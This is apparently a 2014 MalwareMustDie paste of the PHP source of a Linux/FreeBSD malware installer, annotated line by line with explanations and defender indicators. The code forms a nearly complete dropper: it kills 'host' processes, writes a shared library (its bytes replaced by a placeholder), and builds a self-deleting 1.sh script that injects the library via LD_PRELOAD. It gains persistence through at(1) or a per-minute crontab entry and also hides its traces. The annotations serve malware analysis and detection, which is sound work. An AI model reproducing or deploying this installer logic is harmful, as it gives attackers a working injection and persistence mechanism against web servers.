
jinxed source1 of .SO ELF LD_PRELOAD PHP malware installer

MalwareMustDie Jun 10th, 2014 371 Never
  1. // Sample jinxed source code of the .SO ELF LD_PRELOAD PHP malware installer
  2. // MalwareMustDie
  3.  
  4. <?php
  5.  
  // The response is declared as plain text, so the status lines printed further down
  // ("Arch is ...", "SO dumped ...", "AT success", ...) are returned as-is to whoever requested the page.
  6. header("Content-type: text/plain");
  // Fixed numeric string emitted before anything else. Presumably a marker the requester checks
  // to confirm the script ran -- its meaning is not established by this listing.
  7. print "2842123700\n";
  8.  
  // Fallback definition of file_put_contents(), declared only when the running PHP does not
  // already provide one. It opens $filename in 'w' mode, writes $data and returns fwrite()'s
  // result (bytes written), or false when the file cannot be opened. The '@' on fopen()
  // hides the warning PHP would otherwise emit on failure.
  9. if (! function_exists('file_put_contents')) {
  10.         function file_put_contents($filename, $data) {
  11.                 $f = @fopen($filename, 'w');
  12.                 if (! $f)
  13.                         return false;
  14.                 $bytes = fwrite($f, $data);
  15.                 fclose($f);
  16.                 return $bytes;
  17.         }
  18. }
  19.  
  // Sends SIGKILL (-9) to every process named "host" (the basename of /usr/bin/host) through a
  // shell command; '@' suppresses any PHP-level warning from system().
  // Defender note: a web-server account spawning `killall -9 host` is unusual and worth alerting on.
  20. @system("killall -9 ".basename("/usr/bin/host"));
  21.  
  // $so32 / $so64 stand for the 32-bit and 64-bit shared-object contents. In this published
  // ("jinxed") sample both are the placeholder "xxxxxxxxxx"; the real bytes are not on the page.
  22. $so32 = "xxxxxxxxxx";
  23. $so64 = "xxxxxxxxxx";
  // Word-size probe: the string is the largest signed 64-bit integer. Where intval() yields
  // 2147483647 instead, PHP integers are 32 bits wide and the 32-bit variant is selected.
  24. $arch = 64;
  25. if (intval("9223372036854775807") == 2147483647)
  26.         $arch = 32;
  27. print "Arch is ".$arch."\n";
  28. $so = $arch == 32 ? $so32 : $so64;
  // Reads the first 8 bytes of /usr/bin/host. unpack("C*") returns a 1-based array, so $n[8] is
  // the byte at file offset 7 -- the OS/ABI field of an ELF identification header (value 9 is
  // reported as FreeBSD below, anything else as Linux). That byte is copied to the same offset of
  // the library contents. NOTE(review): assumes /usr/bin/host is an ELF file at least 8 bytes long.
  29. $f = fopen("/usr/bin/host", "rb");
  30. if ($f) {
  31.         $n = unpack("C*", fread($f, 8));
  32.         $so[7] = sprintf("%c", $n[8]);
  33.         print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."\n";
  34.         fclose($f);
  35. }
  // Writes the library as ./libworker.so in the script's current working directory and prints
  // the value file_put_contents() returned.
  // Defender note: a file named libworker.so appearing in a web-writable directory is an indicator.
  36. print "SO dumped ".file_put_contents("./libworker.so", $so)."\n";
  // When the MAYHEM_DEBUG environment variable is set, execution stops here: the library has
  // been written but none of the launch steps below run.
  37. if (getenv("MAYHEM_DEBUG"))
  38.         exit(0);
  // $AU = host name + request URI of the request that triggered this script; it is later
  // exported to the launched process as the environment variable AU. The '@' applies to the
  // SERVER_NAME lookup only (it binds tighter than '.').
  39. $AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  40. /* second stage dropper */
  41. $HBN=basename("/usr/bin/host");
  42. $SCP=getcwd();
  // $SCR is the text of a /bin/sh script. As written it: changes into the current directory;
  // if ./libworker.so exists, kills running "host" processes, exports AU and
  // LD_PRELOAD=./libworker.so, runs /usr/bin/host (so the library is loaded into that process),
  // unsets LD_PRELOAD, and rewrites the crontab without lines matching '1\.sh' or 'crontab';
  // finally it deletes itself (rm 1.sh) and exits 0.
  // Defender note: a "host" process whose environment contains LD_PRELOAD and AU is an indicator.
  43. $SCR  ="#!/bin/sh\ncd '".$SCP."'\nif [ -f './libworker.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./libworker.so\n/usr/bin/host\nunset LD_PRELOAD\n";
  44. $SCR .="crontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n";
  // The script is written as 1.sh in the current directory and made read/write/execute for
  // everyone (0777); '@' hides failures of both calls.
  45. @file_put_contents("1.sh", $SCR);
  46. @chmod("1.sh", 0777);
  47. /* try at now, file will be removed, crontab cleaned on success */
  // First launch method: submit 1.sh to the at(1) scheduler for immediate execution.
  // $ret receives the command's exit status.
  48. @system("at now -f 1.sh", $ret);
  49. if ($ret == 0) {
  // Because 1.sh deletes itself when it runs, its disappearance is taken as proof of
  // execution. Polls once per second, five checks at most, then falls through.
  50.         for ($i = 0; $i < 5; $i++) {
  51.                 if (! @file_exists("1.sh")) {
  52.                         print "AT success\n";
  53.                         exit(0);
  54.                 }
  55.                 sleep(1);
  56.         }
  57. }
  // Second launch method: rebuild the current user's crontab from its existing entries (minus
  // lines containing "crontab") plus a new "* * * * *" entry, i.e. every minute, that runs
  // <cwd>/1.sh. Per the script text, 1.sh strips this entry again once it has run.
  // Defender note: a crontab entry for the web-server account pointing at 1.sh is an indicator.
  58. @system("(crontab -l|grep -v crontab;echo;echo '* * * * * ".$SCP."/1.sh')|crontab", $ret);
  59. if ($ret == 0) {
  // Same self-deletion check as the at(1) attempt, with up to 62 one-second polls -- just over
  // one cron interval.
  60.         for ($i = 0; $i < 62; $i++) {
  61.                 if (! @file_exists("1.sh")) {
  62.                         print "CRONTAB success\n";
  63.                         exit(0);
  64.                 }
  65.                 sleep(1);
  66.         }
  67. }
  // Last resort when neither scheduler confirmed execution: run 1.sh directly as a child of
  // the PHP process.
  68. print "Running straight\n";
  69. @system("./1.sh");
  70.  
  71. ?>